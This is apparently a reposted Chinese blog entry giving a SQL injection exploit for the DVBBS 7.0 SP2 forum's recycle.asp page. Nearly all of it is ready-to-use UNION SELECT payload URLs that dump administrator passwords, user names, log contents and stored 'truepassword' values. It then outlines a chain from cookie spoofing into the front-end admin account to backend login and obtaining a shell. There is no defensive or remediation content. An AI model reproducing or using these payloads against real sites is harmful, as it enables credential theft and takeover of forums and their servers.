现在的位置: 首页 > 综合 > 正文

DVBBS 7.0 SP2 注入

2013年01月28日 ⁄ 综合 ⁄ 共 1046字 ⁄ 字号 评论关闭
DVBBS 7.0 SP2 注入 9xiao & 放手 问题recycle.asp的注入漏洞,利用union查询把dv_log中记录的后台管理账号和密码一次性查询。dv_bbs1是回收站的表 recycle.asp?tablename=dv_bbs1 union select 1,1,userpassword,1,1,1 from dv_admin where id=9 union select 1,1,1,1,1,1 from dv_bbs1&page=1 recycle.asp?tablename=dv_bbs1 union select 1,1,username,1,1,1 from dv_admin where id=9 union select 1,1,1,1,1,1 from dv_bbs1&page=1 id=9 可以变下就暴出全部的后台用户名 recycle.asp?tablename=dv_bbs1 union select 1,1,username,1,1,1 from dv_user where usergroupid=4 union select 1,1,1,1,1,1 from dv_bbs1&page=..暴全部用户名 先暴DV LOG,然后根据后台管理员的用户名。暴出对应的前台管理员用户名,然后暴出前台管理员的TUREPASSWORD,COOKIE欺骗进前台,登陆后台拿SHELL 当然如果LOG里有前台管理员的密码,就更省事了。 暴LOG: recycle.asp?tablename=dv_bbs1 union select 1,1,l_content,1,1,1 from dv_log where l_announceid=0 union select 1,1,1,1,1,1 from dv_bbs1&page=1 得到OLDUSERNAME和PASS后,暴对应的前台用户名: recycle.asp?tablename=dv_bbs1 union select 1,1,adduser,1,1,1 from dv_admin where username="后台用户名" union select 1,1,1,1,1,1 from dv_bbs1&page=1 得到前台管理员用户名。然后得到TUREPASSWORD: recycle.asp?tablename=dv_bbs1 union select 1,1,truepassword,1,1,1 from dv_user where username="前台管理员用户名" union select 1,1,1,1,1,1 from dv_bbs1&page=1

抱歉!评论已关闭.